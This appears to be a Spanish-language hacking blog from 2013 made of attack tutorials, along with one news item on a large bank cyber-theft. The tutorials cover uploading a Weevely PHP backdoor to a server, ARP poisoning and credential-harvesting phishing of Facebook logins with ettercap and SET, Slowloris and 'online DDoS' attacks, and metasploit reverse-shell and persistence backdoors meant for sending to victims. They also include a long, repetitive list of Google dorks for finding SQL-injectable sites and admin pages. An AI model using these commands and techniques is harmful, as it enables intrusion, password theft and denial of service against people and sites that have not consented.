martes, 2 de julio de 2013

Tutorial.-Weevely

Weevely Backdoor





Weevely es una herramienta de post-explotación de web , con la que conseguir acceso a un servidor por completo.

Los nuevos módulos para la nueva version 0.7 son

  • More than 30 modules to automatize administration and post exploitation

  1. Ejecutar comandos y navegue sistema de archivos remoto, incluso con restricción de seguridad de    PHP.
  2. Auditoría de errores de configuración de servidor comunes.
  3. Ejecutar consola SQL pivotante en la máquina de destino.
  4. Abrir proxy HTTP para hacer un túnel a través de su tráfico de destino.
  5. Fácil transferencia de archivos desde y hacia el objetivo.
  6. Engendro conchas TCP inversa y directa.
  7. Fuerza bruta las contraseñas de los usuarios del sistema de destino.
  8. Ejecutar escaneo de puertos de equipo de destino.
  9. Comunicaciones de puerta trasera se ocultan en las cookies HTTP.
  10. Las comunicaciones son ofuscado para eludir la detección NIDS firma.
  11. Backdoor código polimórfico PHP se ofusca para evitar HIDS detección AV.
  12. etc....=)Bu
 ¿Donde lo Descargamos ? 
Bueno , hay varias formas, yo os dire que lo podeis clonar con "git", lo que yo hize , ponemos este comando para clonarlo....
 git clone https://github.com/epinna/Weevely Weevely
 Bueno, es sencillo no? colocan eso y weevely estara en su carpeta llamada Weevely, sencillo? por si no les gusta esta forma acá les dejo la web  , para que escojan la suya 
http://epinna.github.io/Weevely/
 Usando Weevely.

Bueno entramos en la carpeta, y para hacer un pequeño backdoor , sencillito , colocamos lo siguiente : 
 Python weevely.py generate "Contraseña"  "Ruta del archivo"
Bueno, con eso , hariamos un backdoor, un ejemplo seria así : 
Python weevely.py generate hacker /home/icebreaker/Escritorio/backdoor.php

y así lo creamos , lo subimos al servidor infectado , una vez hecho esto  para conectarnos, lo hacemos de la siguiente forma con el siguiente comando...
 python weevli "web+el backdoor" "contraseña"
Y así conseguimos una shell , probamos poniendo ls .......


Bueno , y acá se puede ver conectado espero que les gustes y happy hacking! :-D




Publicado por en

miércoles, 22 de mayo de 2013

Noticia.-Mayor Ciberrobo de la historia.



Ocho miembros de un equipo de ciberdelincuentes han sido acusados ​​del mayor robo bancario de la historia, en una operación cuidadosamente coordinada en la que consiguieron un botín de 45 millones de dólares.
Según la información los ciberdelincuentes piratearon las redes de un procesador de tarjetas Mastercard de crédito y débito pre-pagadas (dos bancos de Emiratos Árabes Unidos) para falsificar las mismas y robar en unas pocas horas 45 millones de dólares.
La operación denominada ‘Unlimited Operation’ (por los beneficios ilimitados que potencialmente podría obtener) estaba perfectamente coordinada y se realizó en miles de cajeros automáticos de una veintena de paísesdefraudando directamente al operador sin afectar a cuentas personales.
“En lugar de armas y máscaras, esta organización criminal utilizó ordenadores e Internet… Moviéndose tan rápido como los datos en Internet, la organización se hizo camino desde los sistemas informáticos de corporaciones internacionales a las calles”ha explicado el fiscal que lleva el caso, destacando la “precisión quirúrgica” de los ciberdelincuentes y su capacidad para distribuir miles de tarjetas falsas en una veintena de países.
Siete de ellos han sido detenidos ya y el octavo, se cree el líder de esta banda internacional, fue asesinado a finales del mes de abril en República Dominicana. La investigación continúa en marcha.
Publicado por en

Tutorial.-Ataques Ddos Online.

Bueno chicos! :-D Hola!....
(Este post lo pongo por rellenar... XD ya se habrán dado cuenta...)

No , hombre es que a día de hoy algunas personas no saben que se pueden montar servicios de web que atacan a servidores (Estilo Loic Online ) yo explicare que son y quienes lo utilizan .....empecemos ! Go Go Go!

 ¿Que es un Ddos Online?
Son servicios como ya dije que se montan en servidores generalmente para el ataque de servicios, puertos...etc :-D Online , ¿Por que? , porque imagínate por un segundo que a ese ddos online, entran 100 personas al día , y tu eres una de ellas y tiras una web con ese ddos online, en el caso de denuncia y de todo la pesca , y cojan algo sera la ip del servidor, con la que no podrán hacer nada , ya que , se meten muchas personas diariamente ... Policía -> }:-( .....
¿Quienes lo utilizan?
Hay varios tipos de personas, lo utilizan desde ciberhacktivistas a gobiernos...así que estos ataques tienen tela, bueno , se conocieron muchos el ejemplo que di antes de "Loic Online" Creado por los ciberhacktivistas de anonymous atacaban reuniendose mucha gente , ahora una pregunta que alguno se estara haciendo, ¿Si los de anonymous hacian ese ataque cojian al que contrataban el servidor? Lógicamente...no .... hackeaban y subian ese loic.... }:-| bueno, expliquemos como lo encontramos, uno podemos encontrarlo, poniendo en google o bing, loic online ...te saldran un inmenso numero de paginas dedicadas a este servicio...

Vieron? ....sencillo no? , también podríamos usar algún dorks , por ejemplo inurl:/loic-online/ , o cualquier cosa  , que se les ocurra, no se ...bueno abriremos algún loic .. el típico de anonymous...

Bueno hay ponen la url , y empezara a floodearlo , tengan en cuenta que esto con uno solo es muy complicado, lo que podrían hacer es abrir varios (Ddoser online) , pero aun así seria muy muy complicado, hay una botnet , que lo que hace es buscar estas web, las añade y cuando tu quieres atacar una web, si tienes recolectado 20.000 web como estos (DDOS), pues le das a atacar y le hacen un ddos las 20.000 web's ...entonces si suele caer XD jajaja, ya are el post sobre esta botnet :-D , bueno chicos espero que lo hallan entendido todos y que no tengan problemas....

Salu2 y que no os ddoseen :-D
Publicado por en

martes, 21 de mayo de 2013

Tutorial.-Ettercap + S.e.t = Pishing Perfecto (2/4)

Hola chicos!









Instalar set -> Pincha aquí para ver como se instala

Hoy combinaremos 2 programas maravillosos , que juntos , pueden crear uno de los mejores pishing! (A mi parecer)  , empecemos.... GO!

1º.-Iniciamos S.E.T  nos saldra algo como esto

Le daremos a la 1º opción  (Social Enginering Attacks)  después nos saldrá algo como esto....
Y seleccionamos la opción 2 , (Website Attack Vectors) entonces, nos saldrá algo como esto....
Bueno seleccionamos la opción 3 (Credential Harvester Attack Method) este apartado nos dara 3 opciónes,expliquemoslas apartes que serán las siguientes:
 1) Web Templates  -> Esté cargara las templates por defecto de set...(Viejas...y no muy buenas)
 2) Site Cloner  -> Para que set intente copiar el html y crear una web  (Bastante "Caca" en mi opinión)
 3) Custom Import ->  Está sera para cargar una templates nuestra.... (La mejor para mi)

Sencillo no? , nosotros cargaremos , la 3 opción de estas 3 (Custom Import)......
Bueno, nosotros cargaremos la templates nuestras templaste...os dejare un pack que hice...
Descargar templates -> Pincha acá para descargar
Bueno una vez descargado , nos dirá , que metamos una ip exterior , le daremos a intro pues no la utilizaremos fuera de la red (Aunque se pueda) , y después nos pedirá el Path de donde tenemos las templates las metemos, y una vez hecho eso nos pedirá si queremos que se redireccione a alguna web después de darle a login  después, nos pedirá la ip de la web , hay pondremos nuestra local, o nuestra no ip , así conseguiremos  tener una ip , para hacer dns spoof con ettercap.....

bueno nos vamos a la carpeta donde tenemos los plugins de ettercap en el caso de linux a   /usr/share/ettercap , configuraremos un plugins que se llama etter.dns  bueno , la parte que debemos cambiar es esta.... de la siguiente forma...


Lanzamos lo que vimos anterior mente conocido como Arp Poisoning, (http://e9dcf2f4.linkbucks.com)  y lanzamos en la parte de plugins   , seleccionamos dns spoof , una vez seleccionado se nos quedara el dns spoofing hecho, esto significa que cuando entremos a la web de facebook , se nos redirijira a nuestra trampa, con set y conseguiremos la contraseña...como vemos en este ejemplo..

Idéntico no? , bueno espero que os gustara el tutorial! y happy hacking :-D








Publicado por en

Tutorial.-Instalar Set.

Hola chicos,

hoy os enseñare a instalar set, set (Social Engineering Toolkit) es un programa muy muy completo y bueno de ingeniería social... empecemos , si soys windows user necesitareis python! ....acá les dejo el link
Python -> http://www.python.org/download/

Bueno, sencillo , ahora nos descargamos S.E.T...
link -> https://www.trustedsec.com/downloads/social-engineer-toolkit/ 
Por medio de svn....
svn co https://www.trustedsec.com/downloads/social-engineer-toolkit/  /set
Para utilizarlo al completo deben instalar estos complementos básicos para las ordenes dichas.....
sudo apt-get install ettercap
sudo apt-get install sendmail
sudo apt-get install openjdk-6-jdk
Bueno, una ves hecho eso, miraremos la configuracion que esta en config, lógico , lo configuramos a nuestro gusto  con los parametros necesarios , para cada distribución...
para instalarlo ponemos python setup.py install y se nos instalara nos pedira git, pero si le damos a que no lo tenemos , se nos autoinstalara...:-D
Lo iniciamos , con .... python set
Bueno ya tendrian S.E.T instalado aquí unas imágenes....


Publicado por en

lunes, 20 de mayo de 2013

Tutorial.-Instalar uniscan [ESCANER DE VULNERABILIDADES WEB]

Como instalar Uniscan.

Hola,  hoy os enseñare a instalar uniscan el programa, diseñado y hecho en perl , para escanear web's ! gran programa por cierto, es sencillo su instalación...EMPECEMOS! 
1º.-Descargamos:
Link de Descarga -> http://sourceforge.net/projects/uniscan/files/latest/download
necesita unos cuantos módulos en perl para iniciarlo sin problemas, para conseguirlo, abrimos  la consola y escribimos lo siguiente.........

cpan -i Moose cpan -i threads cpan -i threads::shared cpan -i Thread::Queue cpan -i HTTP::Response cpan -i HTTP::Request cpan -i LWP::UserAgent cpan -i Net::SSLeay cpan -i Getopt::Std

Un ejemplo de escaneos... este vídeo, les ayudara a ver mejor el programa...


Publicado por en

Tutorial y Videotutorial.-Ettercap. Coger contraseñas HTTP y Arp Poisoning (1/4)


Hola chicos,

En este tutorial , os explicare como hacer un Arp poisoning, y como coger contraseñas HTTP ......empecemos......

1º.-Instalamos Ettercap (linux/Windows/Mac Os)

 Linux: (TERMINAL) apt-get install ettercap-graphical
Windows: http://sourceforge.net/projects/ettercap/
Mac Os: http://sourceforge.net/projects/ettercap/

2º.-Prendemos ettercap....en modo gráfico.....
Bueno encendemos el ettercap en linux, colocaríamos en la consola algo como "sudo ettercap --gtk", una vez encendido nos vamos a  la pestaña "Sniff" y a "Unified Sniffing" bueno en esa parte, seleccionamos nuestra tarjeta de red....

Sencillo, por ahora :-D , se nos cargara  los plugins...etc , ahora nos vamos a la pestaña "Hosts"  y después a "Scan for hosts" y esperamos a que escanee los hosts....

Una vez escaneado  nos vamos a la pestaña "Hosts" de nuevo y seleccionamos "Hosts List" y vemos la lista de seleccionados  primero seleccionamos el la victima ... y despues el router , generalmente "192.168.1.1"

Una vez hecho eso, nos vamos a la pestañita que pone MITM (MAN IN THE MIDDLE) bueno, y seleccionamos ARP Poisoning ,sencillo y le ponemos la casilla  "Sniff Remote Conections"....

Bueno eso es sencillo, y una vez hecho le damos  "Ok" seleccionamos la pestaña "Start" y seleccionamos "Start Sniffing", y ahora nos vamos a "View" y a "Connections", para ver las conexiones del que estamos, sniffando la conexión " La Victima " :-) ...

Ahora como cogemos las HTTP? muy fácil esperar a que se conecte a una web http , como www.tubillar.com, o protocolo POP ...etc o cualquier web o servicio inseguro, y se las dará sin mas demora.....

Sencillo no? bueno en la siguiente parte , os enseñare algunos plugins, :-)
Acá les dejo un vídeo sobre el vídeo tutorial, si se escucha mal lo siento , en el próximo estará arreglado , bajar un poco el volumen se oirá bien :-D



Salu2 Amigos, espero que les guste :-D



Publicado por en

domingo, 19 de mayo de 2013

Tutorial.-Ataque Dos con Slowloris. (HTTP DOS)

HTTP DOS

Hola a todos!

Hoy os enseñare, a hacer ataques dos , con Slowloris , estos ataques los hay de 3 maneras, Slowloris ataca con la forma HTTP , por si se preguntan que es, esta imagen de al lado x-D es el símbolo de Slowloris , este programa hecho en perl se puede descargar de su web oficial................. :-D


Link Descargar -> http://ha.ckers.org/slowloris/slowloris.pl

 Link Descargar ipv6: http://ha.ckers.org/slowloris/slowloris6.pl  

 Lo copian , y lo pegan en un blog con el nombre Slowloris.pl , bueno  ahora se tienen que instalar las siguientes librerías....
Para el normal:
 perl -MCPAN -e 'install IO::Socket::INET'
 perl -MCPAN -e 'install IO::Socket::SSL'
Para el Ipv6:
perl -MCPAN -e 'install IO::Socket::INET6'
perl -MCPAN -e 'install IO::Socket::SSL'
Si tienen dudas vallanse a su web oficial -> http://ckers.org/slowloris/ :-D 

Empecemos el ataque.....
Colocaremos el siguiente comando para hacer un ataque, sencillo: 

perl slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
Bueno este es el ataque simple , y muy muy básico , solamente explique esto si quieren que me hunda mas en el tema de los HTTP DOS ,avisen es que tengo que escribir de todos los tipos que hay, y hay unos cuantos x-) jajaja...bueno adios y que no os ddoseen







Publicado por en

¿Que es un ataque Ddos y un Dos? Y como funcionan.

Hola a todos :-D

Hoy os explicare un poco, con palabras sencillas, para que todos lo entiendan que es un ataque Ddos (Distributed Denial of Sevice) o Dos (Denial of Service)...Bueno , lo primero que tengo que decir es que no son lo mismo, la única diferencia es que el Dos , es meno fuerte, y suelen hacerlo unos cuantos pero el el DDOS es mucho mas fuerte, con una botnet , generalmente....

¿Que es un Ddos o Dos?
Un ddos o dos, explicado de forma sencilla, son muchas peticiones a un servidor , hasta que llega un punto en el que no puede dar a basto el servidor y se colapsa , acá les dejo una imagen para que entiendan como funciona el ataque en ambos métodos...
Con una Botnet (Ataque DDOS)

 Este método  es montar una bot  o botnet , en un servidor, {O en tu propio pc , a lo loco x-) jajaja :-D } una botnet parecida a un troyano, es para infectar pero controlar a usuarios desde la misma red de un servidor, a través de un url con un "user" y una "pass".... :-D Yo dejare un post, en como se puede montar Vertenext,Zeus,Flu Project...etc :-D , esto consume los recursos....

Ataque Dos

Esté ataque , sencillo , es igual que el otro pero sin botnet, nada complicado , eh? bueno chicos! :-D ahora me dedicare a escribir como podemos hacer un ataque ddos , desde nuestro pc :-D con una herramienta fuerte, se me olvido mencionar que hay vulnerabilidades como la conocida KillApache, que deja fuera de servico las web, así que sí! hay vulnerabilidades ddos ...

Salu2 y que no os ddoseen  :-D
Publicado por en

sábado, 18 de mayo de 2013

Como crear backdoors en metasploit.[Los tipos]

Hola chicos ,

¿Que es una backdoor?
Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....

Backdoor Meterpreter.
Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit,  digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...
sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" X > "Ruta donde se guardara/Elnombrequequieras.exe"
Bueno , ese seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....

Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

 Backdoors Consola.
Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....

msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" X > "ruta/elnombrequequieras.exe"

y ya esta ahora os enseño una foto de como sería....

Bueno, aquí se ve la shell obtenida! :D ...pasemos a otro...

Backdoor Persistence.
Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....

Hay ven la información sencillo no? :D bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo , jeje soy malvado xD jaja :D bueno para usar este comando como ven hay en los parametros solamente pondremos..
run  persistence -U -i -p 1234 -r "ip"
Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto  inventado hay pongan el que tengan abierto xD :D  , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo ..... y les sale algo parecido a esto...

Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
Despues en un handler  , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondriamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara :D

Backdoors Metsvc.
Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....
run metsvc -A
y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....

Bueno , para interactuar con este, colocan el handler pero de payload ponen :

set PAYLOAD windows/metsvc_bind_tcp
y rellenan los datos correspondientes... :-)

Bueno hasta aquí la mini-clase de los backdoors de metasploit....
Salu2  y hasta la próxima....no dejen ninguna puerta abierta...


Publicado por en

Inyecciones sql a fondo. Dorks para sql . (3/3)

Bueno , chicos primero explicare dorks y despues como defenderse...empezemos!


¿Que es un dorks? 
Un dork es una forma de búsqueda avanzada para buscar cosas especificas, como parametros de errores, pelis...etc :-D

¿Que tipos de dorks hay?
Hay todo tipos de dorks, tantos buscadores halla , pero los mas conocidos son los google dorks, yahoo dorks y bing dorks  bueno , en el proximo post enseñare a usar los google dorks,  y en otros los bing -dorks (Los mejores en mi opinión) y los yahoo dorks... :-D

¿Como se usan? 
Sencillo copian y pegan en google, en el buscador :-D y les saldra las web con esos parametros.. :-D Acá les dejo los dorks...

DORKS GOOGLE: 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
